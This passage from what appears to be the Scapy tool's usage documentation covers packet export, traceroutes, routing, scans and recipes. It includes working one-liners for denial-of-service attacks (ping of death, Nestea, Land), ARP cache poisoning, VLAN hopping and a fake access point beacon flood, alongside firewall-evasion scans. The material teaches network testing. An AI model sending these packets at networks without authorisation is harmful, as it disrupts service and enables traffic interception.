\\x08\\t\\n\\x0b\\x0c\\r\\x0e\\x0f\\x10\\x11\\x12\\x13\\x14\\x15\\x16\\x17\\x18\\x19\\x1a\\x1b\n \\x1c\\x1d\\x1e\\x1f !\"#$%&\\'()*+,-./01234567'\n\nWe can reimport the produced binary string by selecting the appropriate first layer (e.g. 
``Ether()``).\n\n >>> new_pkt = Ether(pkt_raw)\n >>> new_pkt\n <Ether dst=00:50:56:fc:ce:50 src=00:0c:29:2b:53:19 type=0x800 |<IP version=4L \n ihl=5L tos=0x0 len=84 id=0 flags=DF frag=0L ttl=64 proto=icmp chksum=0x5a7c \n src=192.168.25.130 dst=4.2.2.1 options='' |<ICMP type=echo-request code=0 \n chksum=0x9c90 id=0x5a61 seq=0x1 |<Raw load='\\xe6\\xdapI\\xb6\\xe5\\x08\\x00\\x08\\t\\n\n \\x0b\\x0c\\r\\x0e\\x0f\\x10\\x11\\x12\\x13\\x14\\x15\\x16\\x17\\x18\\x19\\x1a\\x1b\\x1c\\x1d\\x1e\n \\x1f !\"#$%&\\'()*+,-./01234567' |>>>>\n\nBase64\n^^^^^^\n\nUsing the ``export_object()`` function, Scapy can export a base64 encoded Python data structure representing a packet::\n\n >>> pkt\n <Ether dst=00:50:56:fc:ce:50 src=00:0c:29:2b:53:19 type=0x800 |<IP version=4L \n ihl=5L tos=0x0 len=84 id=0 flags=DF frag=0L ttl=64 proto=icmp chksum=0x5a7c \n src=192.168.25.130 dst=4.2.2.1 options='' |<ICMP type=echo-request code=0 \n chksum=0x9c90 id=0x5a61 seq=0x1 |<Raw load='\\xe6\\xdapI\\xb6\\xe5\\x08\\x00\\x08\\t\\n\n \\x0b\\x0c\\r\\x0e\\x0f\\x10\\x11\\x12\\x13\\x14\\x15\\x16\\x17\\x18\\x19\\x1a\\x1b\\x1c\\x1d\\x1e\\x1f \n !\"#$%&\\'()*+,-./01234567' |>>>>\n >>> export_object(pkt)\n eNplVwd4FNcRPt2dTqdTQ0JUUYwN+CgS0gkJONFEs5WxFDB+CdiI8+pupVl0d7uzRUiYtcEGG4ST\n OD1OnB6nN6c4cXrvwQmk2U5xA9tgO70XMm+1rA78qdzbfTP/lDfzz7tD4WwmU1C0YiaT2Gqjaiao\n bMlhCrsUSYrYoKbmcxZFXSpPiohlZikm6ltb063ZdGpNOjWQ7mhPt62hChHJWTbFvb0O/u1MD2bT\n WZXXVCmi9pihUqI3FHdEQslriiVfWFTVT9VYpog6Q7fsjG0qRWtQNwsW1fRTrUg4xZxq5pUx1aS6\n ...\n\nThe output above can be reimported back into Scapy using ``import_object()``::\n\n >>> new_pkt = import_object()\n eNplVwd4FNcRPt2dTqdTQ0JUUYwN+CgS0gkJONFEs5WxFDB+CdiI8+pupVl0d7uzRUiYtcEGG4ST\n OD1OnB6nN6c4cXrvwQmk2U5xA9tgO70XMm+1rA78qdzbfTP/lDfzz7tD4WwmU1C0YiaT2Gqjaiao\n bMlhCrsUSYrYoKbmcxZFXSpPiohlZikm6ltb063ZdGpNOjWQ7mhPt62hChHJWTbFvb0O/u1MD2bT\n WZXXVCmi9pihUqI3FHdEQslriiVfWFTVT9VYpog6Q7fsjG0qRWtQNwsW1fRTrUg4xZxq5pUx1aS6\n ...\n >>> new_pkt\n <Ether dst=00:50:56:fc:ce:50 src=00:0c:29:2b:53:19 type=0x800 |<IP version=4L \n ihl=5L tos=0x0 len=84 id=0 flags=DF frag=0L ttl=64 proto=icmp chksum=0x5a7c \n src=192.168.25.130 dst=4.2.2.1 options='' |<ICMP type=echo-request code=0 \n chksum=0x9c90 id=0x5a61 seq=0x1 |<Raw load='\\xe6\\xdapI\\xb6\\xe5\\x08\\x00\\x08\\t\\n\n \\x0b\\x0c\\r\\x0e\\x0f\\x10\\x11\\x12\\x13\\x14\\x15\\x16\\x17\\x18\\x19\\x1a\\x1b\\x1c\\x1d\\x1e\\x1f \n !\"#$%&\\'()*+,-./01234567' |>>>>\n\nSessions\n^^^^^^^^\n\nAt last Scapy is capable of saving all session variables using the ``save_session()`` function:\n\n>>> dir()\n['__builtins__', 'conf', 'new_pkt', 'pkt', 'pkt_export', 'pkt_hex', 'pkt_raw', 'pkts']\n>>> save_session(\"session.scapy\")\n\nNext time you start Scapy you can load the previous saved session using the ``load_session()`` command::\n\n >>> dir()\n ['__builtins__', 'conf']\n >>> load_session(\"session.scapy\")\n >>> dir()\n ['__builtins__', 'conf', 'new_pkt', 'pkt', 'pkt_export', 'pkt_hex', 'pkt_raw', 'pkts']\n\n\nMaking tables\n-------------\n\n.. index::\n single: tables, make_table()\n\nNow we have a demonstration of the ``make_table()`` presentation function. It takes a list as parameter, and a function who returns a 3-uple. The first element is the value on the x axis from an element of the list, the second is about the y value and the third is the value that we want to see at coordinates (x,y). The result is a table. This function has 2 variants, ``make_lined_table()`` and ``make_tex_table()`` to copy/paste into your LaTeX pentest report. 
Those functions are available as methods of a result object:\n\nHere we can see a multi-parallel traceroute (Scapy already has a multi-target TCP traceroute function, see later)::\n\n >>> ans, unans = sr(IP(dst=\"www.test.fr/30\", ttl=(1,6))/TCP())\n Received 49 packets, got 24 answers, remaining 0 packets\n >>> ans.make_table( lambda (s,r): (s.dst, s.ttl, r.src) )\n 216.15.189.192 216.15.189.193 216.15.189.194 216.15.189.195 \n 1 192.168.8.1 192.168.8.1 192.168.8.1 192.168.8.1 \n 2 81.57.239.254 81.57.239.254 81.57.239.254 81.57.239.254 \n 3 213.228.4.254 213.228.4.254 213.228.4.254 213.228.4.254 \n 4 213.228.3.3 213.228.3.3 213.228.3.3 213.228.3.3 \n 5 193.251.254.1 193.251.251.69 193.251.254.1 193.251.251.69 \n 6 193.251.241.174 193.251.241.178 193.251.241.174 193.251.241.178 \n\nHere is a more complex example, identifying machines from their IPID field. We can see that 172.20.80.200:22 is answered by the same IP stack as 172.20.80.201, and that 172.20.80.197:25 is not answered by the same IP stack as the other ports on the same IP.\n\n::\n\n >>> ans, unans = sr(IP(dst=\"172.20.80.192/28\")/TCP(dport=[20,21,22,25,53,80]))\n Received 142 packets, got 25 answers, remaining 71 packets\n >>> ans.make_table(lambda (s,r): (s.dst, s.dport, r.sprintf(\"%IP.id%\")))\n 172.20.80.196 172.20.80.197 172.20.80.198 172.20.80.200 172.20.80.201 \n 20 0 4203 7021 - 11562 \n 21 0 4204 7022 - 11563 \n 22 0 4205 7023 11561 11564 \n 25 0 0 7024 - 11565 \n 53 0 4207 7025 - 11566 \n 80 0 4028 7026 - 11567 \n\nThis can help identify network topologies very easily when playing with TTL, displaying the received TTL, etc.\n\nRouting\n-------\n\n.. index::\n single: Routing, conf.route\n\nNow Scapy has its own routing table, so that you can have your packets routed differently from the system::\n\n >>> conf.route\n Network Netmask Gateway Iface\n 127.0.0.0 255.0.0.0 0.0.0.0 lo\n 192.168.8.0 255.255.255.0 0.0.0.0 eth0\n 0.0.0.0 0.0.0.0 192.168.8.1 eth0\n >>> conf.route.delt(net=\"0.0.0.0/0\",gw=\"192.168.8.1\")\n >>> conf.route.add(net=\"0.0.0.0/0\",gw=\"192.168.8.254\")\n >>> conf.route.add(host=\"192.168.1.1\",gw=\"192.168.8.1\")\n >>> conf.route\n Network Netmask Gateway Iface\n 127.0.0.0 255.0.0.0 0.0.0.0 lo\n 192.168.8.0 255.255.255.0 0.0.0.0 eth0\n 0.0.0.0 0.0.0.0 192.168.8.254 eth0\n 192.168.1.1 255.255.255.255 192.168.8.1 eth0\n >>> conf.route.resync()\n >>> conf.route\n Network Netmask Gateway Iface\n 127.0.0.0 255.0.0.0 0.0.0.0 lo\n 192.168.8.0 255.255.255.0 0.0.0.0 eth0\n 0.0.0.0 0.0.0.0 192.168.8.1 eth0\n\nGnuplot\n-------\n\n.. index::\n single: Gnuplot, plot()\n\nWe can easily plot some harvested values using Gnuplot. (Make sure that you have Gnuplot-py and Gnuplot installed.)\nFor example, we can observe the IP ID patterns to know how many distinct IP stacks are used behind a load balancer::\n\n >>> a, b = sr(IP(dst=\"www.target.com\")/TCP(sport=[RandShort()]*1000))\n >>> a.plot(lambda x:x[1].id)\n <Gnuplot._Gnuplot.Gnuplot instance at 0xb7d6a74c>\n\n.. image:: graphics/ipid.png\n\n\nTCP traceroute (2)\n------------------\n\n.. index::\n single: traceroute(), Traceroute\n\nScapy also has a powerful TCP traceroute function. Unlike other traceroute programs that wait for each node to reply before going to the next, Scapy sends all the packets at the same time. 
This has the disadvantage that it can't know when to stop (thus the maxttl parameter) but the great advantage that it took less than 3 seconds to get this multi-target traceroute result::\n\n >>> traceroute([\"www.yahoo.com\",\"www.altavista.com\",\"www.wisenut.com\",\"www.copernic.com\"],maxttl=20)\n Received 80 packets, got 80 answers, remaining 0 packets\n 193.45.10.88:80 216.109.118.79:80 64.241.242.243:80 66.94.229.254:80 \n 1 192.168.8.1 192.168.8.1 192.168.8.1 192.168.8.1 \n 2 82.243.5.254 82.243.5.254 82.243.5.254 82.243.5.254 \n 3 213.228.4.254 213.228.4.254 213.228.4.254 213.228.4.254 \n 4 212.27.50.46 212.27.50.46 212.27.50.46 212.27.50.46 \n 5 212.27.50.37 212.27.50.41 212.27.50.37 212.27.50.41 \n 6 212.27.50.34 212.27.50.34 213.228.3.234 193.251.251.69 \n 7 213.248.71.141 217.118.239.149 208.184.231.214 193.251.241.178 \n 8 213.248.65.81 217.118.224.44 64.125.31.129 193.251.242.98 \n 9 213.248.70.14 213.206.129.85 64.125.31.186 193.251.243.89 \n 10 193.45.10.88 SA 213.206.128.160 64.125.29.122 193.251.254.126 \n 11 193.45.10.88 SA 206.24.169.41 64.125.28.70 216.115.97.178 \n 12 193.45.10.88 SA 206.24.226.99 64.125.28.209 66.218.64.146 \n 13 193.45.10.88 SA 206.24.227.106 64.125.29.45 66.218.82.230 \n 14 193.45.10.88 SA 216.109.74.30 64.125.31.214 66.94.229.254 SA \n 15 193.45.10.88 SA 216.109.120.149 64.124.229.109 66.94.229.254 SA \n 16 193.45.10.88 SA 216.109.118.79 SA 64.241.242.243 SA 66.94.229.254 SA \n 17 193.45.10.88 SA 216.109.118.79 SA 64.241.242.243 SA 66.94.229.254 SA \n 18 193.45.10.88 SA 216.109.118.79 SA 64.241.242.243 SA 66.94.229.254 SA \n 19 193.45.10.88 SA 216.109.118.79 SA 64.241.242.243 SA 66.94.229.254 SA \n 20 193.45.10.88 SA 216.109.118.79 SA 64.241.242.243 SA 66.94.229.254 SA \n (<Traceroute: UDP:0 TCP:28 ICMP:52 Other:0>, <Unanswered: UDP:0 TCP:0 ICMP:0 Other:0>)\n\nThe last line is in fact the result of the function : a traceroute result object and a packet list of unanswered packets. The traceroute result is a more specialised version (a subclass, in fact) of a classic result object. 
We can save it to consult the traceroute result again a bit later, or to deeply inspect one of the answers, for example to check padding.\n\n >>> result, unans = _\n >>> result.show()\n 193.45.10.88:80 216.109.118.79:80 64.241.242.243:80 66.94.229.254:80 \n 1 192.168.8.1 192.168.8.1 192.168.8.1 192.168.8.1 \n 2 82.251.4.254 82.251.4.254 82.251.4.254 82.251.4.254 \n 3 213.228.4.254 213.228.4.254 213.228.4.254 213.228.4.254 \n [...]\n >>> result.filter(lambda x: Padding in x[1])\n\nLike any result object, traceroute objects can be added :\n\n >>> r2, unans = traceroute([\"www.voila.com\"],maxttl=20)\n Received 19 packets, got 19 answers, remaining 1 packets\n 195.101.94.25:80 \n 1 192.168.8.1 \n 2 82.251.4.254 \n 3 213.228.4.254 \n 4 212.27.50.169 \n 5 212.27.50.162 \n 6 193.252.161.97 \n 7 193.252.103.86 \n 8 193.252.103.77 \n 9 193.252.101.1 \n 10 193.252.227.245 \n 12 195.101.94.25 SA \n 13 195.101.94.25 SA \n 14 195.101.94.25 SA \n 15 195.101.94.25 SA \n 16 195.101.94.25 SA \n 17 195.101.94.25 SA \n 18 195.101.94.25 SA \n 19 195.101.94.25 SA \n 20 195.101.94.25 SA \n >>>\n >>> r3=result+r2\n >>> r3.show()\n 195.101.94.25:80 212.23.37.13:80 216.109.118.72:80 64.241.242.243:80 66.94.229.254:80 \n 1 192.168.8.1 192.168.8.1 192.168.8.1 192.168.8.1 192.168.8.1 \n 2 82.251.4.254 82.251.4.254 82.251.4.254 82.251.4.254 82.251.4.254 \n 3 213.228.4.254 213.228.4.254 213.228.4.254 213.228.4.254 213.228.4.254 \n 4 212.27.50.169 212.27.50.169 212.27.50.46 - 212.27.50.46 \n 5 212.27.50.162 212.27.50.162 212.27.50.37 212.27.50.41 212.27.50.37 \n 6 193.252.161.97 194.68.129.168 212.27.50.34 213.228.3.234 193.251.251.69 \n 7 193.252.103.86 212.23.42.33 217.118.239.185 208.184.231.214 193.251.241.178 \n 8 193.252.103.77 212.23.42.6 217.118.224.44 64.125.31.129 193.251.242.98 \n 9 193.252.101.1 212.23.37.13 SA 213.206.129.85 64.125.31.186 193.251.243.89 \n 10 193.252.227.245 212.23.37.13 SA 213.206.128.160 64.125.29.122 193.251.254.126 \n 11 - 212.23.37.13 SA 206.24.169.41 64.125.28.70 216.115.97.178 \n 12 195.101.94.25 SA 212.23.37.13 SA 206.24.226.100 64.125.28.209 216.115.101.46 \n 13 195.101.94.25 SA 212.23.37.13 SA 206.24.238.166 64.125.29.45 66.218.82.234 \n 14 195.101.94.25 SA 212.23.37.13 SA 216.109.74.30 64.125.31.214 66.94.229.254 SA \n 15 195.101.94.25 SA 212.23.37.13 SA 216.109.120.151 64.124.229.109 66.94.229.254 SA \n 16 195.101.94.25 SA 212.23.37.13 SA 216.109.118.72 SA 64.241.242.243 SA 66.94.229.254 SA \n 17 195.101.94.25 SA 212.23.37.13 SA 216.109.118.72 SA 64.241.242.243 SA 66.94.229.254 SA \n 18 195.101.94.25 SA 212.23.37.13 SA 216.109.118.72 SA 64.241.242.243 SA 66.94.229.254 SA \n 19 195.101.94.25 SA 212.23.37.13 SA 216.109.118.72 SA 64.241.242.243 SA 66.94.229.254 SA \n 20 195.101.94.25 SA 212.23.37.13 SA 216.109.118.72 SA 64.241.242.243 SA 66.94.229.254 SA \n\nTraceroute result object also have a very neat feature: they can make a directed graph from all the routes they got, and cluster them by AS. You will need graphviz. 
By default, ImageMagick is used to display the graph.\n\n >>> res, unans = traceroute([\"www.microsoft.com\",\"www.cisco.com\",\"www.yahoo.com\",\"www.wanadoo.fr\",\"www.pacsec.com\"],dport=[80,443],maxttl=20,retry=-2)\n Received 190 packets, got 190 answers, remaining 10 packets\n 193.252.122.103:443 193.252.122.103:80 198.133.219.25:443 198.133.219.25:80 207.46...\n 1 192.168.8.1 192.168.8.1 192.168.8.1 192.168.8.1 192.16...\n 2 82.251.4.254 82.251.4.254 82.251.4.254 82.251.4.254 82.251...\n 3 213.228.4.254 213.228.4.254 213.228.4.254 213.228.4.254 213.22...\n [...]\n >>> res.graph() # piped to ImageMagick's display program. Image below.\n >>> res.graph(type=\"ps\",target=\"| lp\") # piped to postscript printer\n >>> res.graph(target=\"> /tmp/graph.svg\") # saved to file \n\n.. image:: graphics/graph_traceroute.png\n\nIf you have VPython installed, you can also have a 3D representation of the traceroute. With the right button, you can rotate the scene, with the middle button, you can zoom, with the left button, you can move the scene. If you click on a ball, its IP will appear/disappear. If you Ctrl-click on a ball, ports 21, 22, 23, 25, 80 and 443 will be scanned and the result displayed::\n\n >>> res.trace3D()\n\n.. image:: graphics/trace3d_1.png\n\n.. image:: graphics/trace3d_2.png\n\nWireless frame injection\n------------------------\n\n.. index::\n single: FakeAP, Dot11, wireless, WLAN\n\nProvided that your wireless card and driver are correctly configured for frame injection\n\n::\n\n $ iw dev wlan0 interface add mon0 type monitor\n $ ifconfig mon0 up\n\nOn Windows, if using Npcap, the equivalent would be to call\n\n # Of course, conf.iface can be replaced by any interfaces accessed through IFACES\n >>> conf.iface.setmonitor(True)\n\nyou can have a kind of FakeAP::\n\n >>> sendp(RadioTap()/\n Dot11(addr1=\"ff:ff:ff:ff:ff:ff\",\n addr2=\"00:01:02:03:04:05\",\n addr3=\"00:01:02:03:04:05\")/\n Dot11Beacon(cap=\"ESS\", timestamp=1)/\n Dot11Elt(ID=\"SSID\", info=RandString(RandNum(1,50)))/\n Dot11Elt(ID=\"Rates\", info='\\x82\\x84\\x0b\\x16')/\n Dot11Elt(ID=\"DSset\", info=\"\\x03\")/\n Dot11Elt(ID=\"TIM\", info=\"\\x00\\x01\\x00\\x00\"),\n iface=\"mon0\", loop=1)\n\nDepending on the driver, the commands needed to get a working frame injection interface may vary. You may also have to replace the first pseudo-layer (in the example ``RadioTap()``) by ``PrismHeader()``, or by a proprietary pseudo-layer, or even remove it.\n\n\nSimple one-liners\n=================\n\n\nACK Scan\n--------\n\nUsing Scapy's powerful packet crafting facilities we can quickly replicate classic TCP scans.\nFor example, the following packets will be sent to simulate an ACK scan::\n\n >>> ans, unans = sr(IP(dst=\"www.slashdot.org\")/TCP(dport=[80,666],flags=\"A\"))\n\nWe can find unfiltered ports in answered packets::\n\n >>> for s,r in ans:\n ... if s[TCP].dport == r[TCP].sport:\n ... print(\"%d is unfiltered\" % s[TCP].dport)\n\nSimilarly, filtered ports can be found with unanswered packets::\n\n >>> for s in unans: \n ... print(\"%d is filtered\" % s[TCP].dport)\n\n\nXmas Scan\n---------\n\nXmas Scan can be launched using the following command::\n\n >>> ans, unans = sr(IP(dst=\"192.168.1.1\")/TCP(dport=666,flags=\"FPU\") )\n\nChecking RST responses will reveal closed ports on the target. 
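\n\nFor instance, closed ports could be listed by filtering on the RST flag. The following is only a minimal sketch that reuses the ``summary()`` filter/display style shown earlier (0x04 being the RST bit of the TCP flags field)::\n\n >>> ans.summary(lfilter=lambda (s,r): TCP in r and r[TCP].flags & 4, prn=lambda (s,r): r.sprintf(\"%TCP.sport% is closed (RST)\"))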
\n\nIP Scan\n-------\n\nA lower level IP Scan can be used to enumerate supported protocols::\n\n >>> ans, unans = sr(IP(dst=\"192.168.1.1\",proto=(0,255))/\"SCAPY\",retry=2)\n\n\nARP Ping\n--------\n\nThe fastest way to discover hosts on a local ethernet network is to use the ARP Ping method::\n\n >>> ans, unans = srp(Ether(dst=\"ff:ff:ff:ff:ff:ff\")/ARP(pdst=\"192.168.1.0/24\"),timeout=2)\n\nAnswers can be reviewed with the following command::\n\n >>> ans.summary(lambda (s,r): r.sprintf(\"%Ether.src% %ARP.psrc%\") )\n\nScapy also includes a built-in arping() function which performs similar to the above two commands:\n\n >>> arping(\"192.168.1.*\")\n\n\nICMP Ping\n---------\n\nClassical ICMP Ping can be emulated using the following command::\n\n >>> ans, unans = sr(IP(dst=\"192.168.1.1-254\")/ICMP())\n\nInformation on live hosts can be collected with the following request::\n\n >>> ans.summary(lambda (s,r): r.sprintf(\"%IP.src% is alive\") )\n\n\nTCP Ping\n--------\n\nIn cases where ICMP echo requests are blocked, we can still use various TCP Pings such as TCP SYN Ping below::\n\n >>> ans, unans = sr( IP(dst=\"192.168.1.*\")/TCP(dport=80,flags=\"S\") )\n\nAny response to our probes will indicate a live host. We can collect results with the following command::\n\n >>> ans.summary( lambda(s,r) : r.sprintf(\"%IP.src% is alive\") )\n\n\nUDP Ping\n--------\n\nIf all else fails there is always UDP Ping which will produce ICMP Port unreachable errors from live hosts. Here you can pick any port which is most likely to be closed, such as port 0::\n\n >>> ans, unans = sr( IP(dst=\"192.168.*.1-10\")/UDP(dport=0) )\n\nOnce again, results can be collected with this command:\n\n >>> ans.summary( lambda(s,r) : r.sprintf(\"%IP.src% is alive\") )\n\n\n\nClassical attacks\n-----------------\n\nMalformed packets::\n\n >>> send(IP(dst=\"10.1.1.5\", ihl=2, version=3)/ICMP()) \n\nPing of death (Muuahahah)::\n\n >>> send( fragment(IP(dst=\"10.0.0.5\")/ICMP()/(\"X\"*60000)) ) \n\nNestea attack::\n\n >>> send(IP(dst=target, id=42, flags=\"MF\")/UDP()/(\"X\"*10)) \n >>> send(IP(dst=target, id=42, frag=48)/(\"X\"*116)) \n >>> send(IP(dst=target, id=42, flags=\"MF\")/UDP()/(\"X\"*224)) \n \nLand attack (designed for Microsoft Windows)::\n\n >>> send(IP(src=target,dst=target)/TCP(sport=135,dport=135))\n\nARP cache poisoning \n------------------- \nThis attack prevents a client from joining the gateway by poisoning \nits ARP cache through a VLAN hopping attack. \n\nClassic ARP cache poisoning::\n\n >>> send( Ether(dst=clientMAC)/ARP(op=\"who-has\", psrc=gateway, pdst=client), \n inter=RandNum(10,40), loop=1 ) \n\nARP cache poisoning with double 802.1q encapsulation::\n \n >>> send( Ether(dst=clientMAC)/Dot1Q(vlan=1)/Dot1Q(vlan=2) \n /ARP(op=\"who-has\", psrc=gateway, pdst=client),\n inter=RandNum(10,40), loop=1 )\n\nTCP Port Scanning \n-----------------\n \nSend a TCP SYN on each port. 
Wait for a SYN-ACK or a RST or an ICMP error:: \n\n >>> res, unans = sr( IP(dst=\"target\") \n /TCP(flags=\"S\", dport=(1,1024)) ) \n\nPossible result visualization: open ports\n\n::\n\n >>> res.nsummary( lfilter=lambda (s,r): (r.haslayer(TCP) and (r.getlayer(TCP).flags & 2)) )\n \n \nIKE Scanning\n------------\n\nWe try to identify VPN concentrators by sending ISAKMP Security Association proposals\nand receiving the answers::\n\n >>> res, unans = sr( IP(dst=\"192.168.1.*\")/UDP()\n /ISAKMP(init_cookie=RandString(8), exch_type=\"identity prot.\") \n /ISAKMP_payload_SA(prop=ISAKMP_payload_Proposal()) \n ) \n\nVisualizing the results in a list::\n\n >>> res.nsummary(prn=lambda (s,r): r.src, lfilter=lambda (s,r): r.haslayer(ISAKMP) ) \n \n \n\nAdvanced traceroute\n-------------------\n\nTCP SYN traceroute\n^^^^^^^^^^^^^^^^^^\n\n::\n\n >>> ans, unans = sr(IP(dst=\"4.2.2.1\",ttl=(1,10))/TCP(dport=53,flags=\"S\"))\n\nResults would be::\n\n >>> ans.summary( lambda(s,r) : r.sprintf(\"%IP.src%\\t{ICMP:%ICMP.type%}\\t{TCP:%TCP.flags%}\"))\n 192.168.1.1 time-exceeded\n 68.86.90.162 time-exceeded\n 4.79.43.134 time-exceeded\n 4.79.43.133 time-exceeded\n 4.68.18.126 time-exceeded\n 4.68.123.38 time-exceeded\n 4.2.2.1 SA\n\n\nUDP traceroute\n^^^^^^^^^^^^^^\n\nTracerouting an UDP application like we do with TCP is not \nreliable, because there's no handshake. We need to give an applicative payload (DNS, ISAKMP, \nNTP, etc.) to deserve an answer::\n\n >>> res, unans = sr(IP(dst=\"target\", ttl=(1,20))\n /UDP()/DNS(qd=DNSQR(qname=\"test.com\")) \n\nWe can visualize the results as a list of routers::\n\n >>> res.make_table(lambda (s,r): (s.dst, s.ttl, r.src)) \n\n\nDNS traceroute\n^^^^^^^^^^^^^^\n\nWe can perform a DNS traceroute by specifying a complete packet in ``l4`` parameter of ``traceroute()`` function::\n\n >>> ans, unans = traceroute(\"4.2.2.1\",l4=UDP(sport=RandShort())/DNS(qd=DNSQR(qname=\"thesprawl.org\")))\n Begin emission:\n ..*....******...******.***...****Finished to send 30 packets.\n *****...***...............................\n Received 75 packets, got 28 answers, remaining 2 packets\n 4.2.2.1:udp53 \n 1 192.168.1.1 11 \n 4 68.86.90.162 11 \n 5 4.79.43.134 11 \n 6 4.79.43.133 11 \n 7 4.68.18.62 11 \n 8 4.68.123.6 11 \n 9 4.2.2.1 \n ...\n\n\nEtherleaking \n------------\n\n::\n\n >>> sr1(IP(dst=\"172.16.1.232\")/ICMP()) \n <IP src=172.16.1.232 proto=1 [...] |<ICMP code=0 type=0 [...]| \n <Padding load=’0O\\x02\\x01\\x00\\x04\\x06public\\xa2B\\x02\\x02\\x1e’ |>>> \n\nICMP leaking\n------------ \n\nThis was a Linux 2.0 bug:: \n\n >>> sr1(IP(dst=\"172.16.1.1\", options=\"\\x02\")/ICMP()) \n <IP src=172.16.1.1 [...] |<ICMP code=0 type=12 [...] | \n <IPerror src=172.16.1.24 options=’\\x02\\x00\\x00\\x00’ [...] 
| \n <ICMPerror code=0 type=8 id=0x0 seq=0x0 chksum=0xf7ff | \n <Padding load=’\\x00[...]\\x00\\x1d.\\x00V\\x1f\\xaf\\xd9\\xd4;\\xca’ |>>>>> \n\n\nVLAN hopping \n------------\n\nIn very specific conditions, a double 802.1q encapsulation will \nmake a packet jump to another VLAN::\n \n >>> sendp(Ether()/Dot1Q(vlan=2)/Dot1Q(vlan=7)/IP(dst=target)/ICMP()) \n\n\nWireless sniffing\n-----------------\n\nThe following command will display information similar to most wireless sniffers::\n\n>>> sniff(iface=\"ath0\",prn=lambda x:x.sprintf(\"{Dot11Beacon:%Dot11.addr3%\\t%Dot11Beacon.info%\\t%PrismHeader.channel%\\t%Dot11Beacon.cap%}\"))\n\nThe above command will produce output similar to the one below::\n\n 00:00:00:01:02:03 netgear 6L ESS+privacy+PBCC\n 11:22:33:44:55:66 wireless_100 6L short-slot+ESS+privacy\n 44:55:66:00:11:22 linksys 6L short-slot+ESS+privacy\n 12:34:56:78:90:12 NETGEAR 6L short-slot+ESS+privacy+short-preamble\n\n\nRecipes \n=======\n\nSimplistic ARP Monitor\n----------------------\n\nThis program uses the ``sniff()`` callback (parameter prn). The store parameter is set to 0 so that the ``sniff()`` function will not store anything (as it would do otherwise) and thus can run forever. The filter parameter is used for better performances on high load : the filter is applied inside the kernel and Scapy will only see ARP traffic.\n\n::\n\n #! /usr/bin/env python\n from scapy.all import *\n \n def arp_monitor_callback(pkt):\n if ARP in pkt and pkt[ARP].op in (1,2): #who-has or is-at\n return pkt.sprintf(\"%ARP.hwsrc% %ARP.psrc%\")\n \n sniff(prn=arp_monitor_callback, filter=\"arp\", store=0)\n\nIdentifying rogue DHCP servers on your LAN \n-------------------------------------------\n\n.. index::\n single: DHCP\n\nProblem\n^^^^^^^\n\nYou suspect that someone has installed an additional, unauthorized DHCP server on your LAN -- either unintentionally or maliciously. \nThus you want to check for any active DHCP servers and identify their IP and MAC addresses. 
\n\nSolution\n^^^^^^^^\n\nUse Scapy to send a DHCP discover request and analyze the replies::\n\n >>> conf.checkIPaddr = False\n >>> fam,hw = get_if_raw_hwaddr(conf.iface)\n >>> dhcp_discover = Ether(dst=\"ff:ff:ff:ff:ff:ff\")/IP(src=\"0.0.0.0\",dst=\"255.255.255.255\")/UDP(sport=68,dport=67)/BOOTP(chaddr=hw)/DHCP(options=[(\"message-type\",\"discover\"),\"end\"])\n >>> ans, unans = srp(dhcp_discover, multi=True) # Press CTRL-C after several seconds\n Begin emission:\n Finished to send 1 packets.\n .*...*..\n Received 8 packets, got 2 answers, remaining 0 packets\n\nIn this case we got 2 replies, so there were two active DHCP servers on the test network::\n\n >>> ans.summary()\n Ether / IP / UDP 0.0.0.0:bootpc > 255.255.255.255:bootps / BOOTP / DHCP ==> Ether / IP / UDP 192.168.1.1:bootps > 255.255.255.255:bootpc / BOOTP / DHCP\n Ether / IP / UDP 0.0.0.0:bootpc > 255.255.255.255:bootps / BOOTP / DHCP ==> Ether / IP / UDP 192.168.1.11:bootps > 255.255.255.255:bootpc / BOOTP / DHCP\n\nWe are only interested in the MAC and IP addresses of the replies::\n\n >>> for p in ans: print p[1][Ether].src, p[1][IP].src\n ...\n 00:de:ad:be:ef:00 192.168.1.1\n 00:11:11:22:22:33 192.168.1.11\n\nDiscussion\n^^^^^^^^^^\n\nWe specify ``multi=True`` to make Scapy wait for more answer packets after the first response is received.\nThis is also the reason why we can't use the more convenient ``dhcp_request()`` function and have to construct the DHCP packet manually: ``dhcp_request()`` uses ``srp1()`` for sending and receiving and thus would immediately return after the first answer packet. \n\nMoreover, Scapy normally makes sure that replies come from the same IP address the stimulus was sent to. But our DHCP packet is sent to the IP broadcast address (255.255.255.255) and any answer packet will have the IP address of the replying DHCP server as its source IP address (e.g. 192.168.1.1). Because these IP addresses don't match, we have to disable Scapy's check with ``conf.checkIPaddr = False`` before sending the stimulus. \n\nSee also\n^^^^^^^^\n\nhttp://en.wikipedia.org/wiki/Rogue_DHCP\n\n\n\nFirewalking\n-----------\n\nTTL decrementation occurs after a filtering operation, so only packets that are not filtered generate an ICMP TTL exceeded message::\n\n >>> ans, unans = sr(IP(dst=\"172.16.4.27\", ttl=16)/TCP(dport=(1,1024))) \n >>> for s,r in ans: \n if r.haslayer(ICMP) and r.payload.type == 11: \n print s.dport \n\nTo find subnets on a multi-NIC firewall, note that only its own NICs' IPs are reachable with this TTL::\n\n >>> ans, unans = sr(IP(dst=\"172.16.5/24\", ttl=15)/TCP()) \n >>> for i in unans: print i.dst\n\n\nTCP Timestamp Filtering\n------------------------\n\nProblem\n^^^^^^^\n\nMany firewalls include a rule to drop TCP packets that do not have the TCP Timestamp option set, which is a common occurrence in popular port scanners.\n\nSolution\n^^^^^^^^\n\nTo allow Scapy to reach the target destination, additional options must be used::\n\n >>> sr1(IP(dst=\"72.14.207.99\")/TCP(dport=80,flags=\"S\",options=[('Timestamp',(0,0))]))\n\n\n\nViewing packets with Wireshark\n------------------------------\n\n.. 
index::\n single: wireshark()\n\nProblem\n^^^^^^^\n\nYou have generated or sniffed some packets with Scapy and want to view them with `Wireshark <http://www.wireshark.org>`_, because of its advanced packet dissection abilities.\n\nSolution\n^^^^^^^^\n\nThat's what the ``wireshark()`` function is for:\n\n >>> packets = Ether()/IP(dst=Net(\"google.com/30\"))/ICMP() # first generate some packets\n >>> wireshark(packets) # show them with Wireshark\n\nWireshark will start in the background and show your packets.\n \nDiscussion\n^^^^^^^^^^\n\nThe ``wireshark()`` function generates a temporary pcap-file containing your packets, starts Wireshark in the background and makes it read the file on startup. \n\nPlease remember that Wireshark works with Layer 2 packets (usually called \"frames\"). So we had to add an ``Ether()`` header to our ICMP packets. Passing just IP packets (layer 3) to Wireshark will give strange results.\n\nYou can tell Scapy where to find the Wireshark executable by changing the ``conf.prog.wireshark`` configuration setting.\n\n\n\nOS 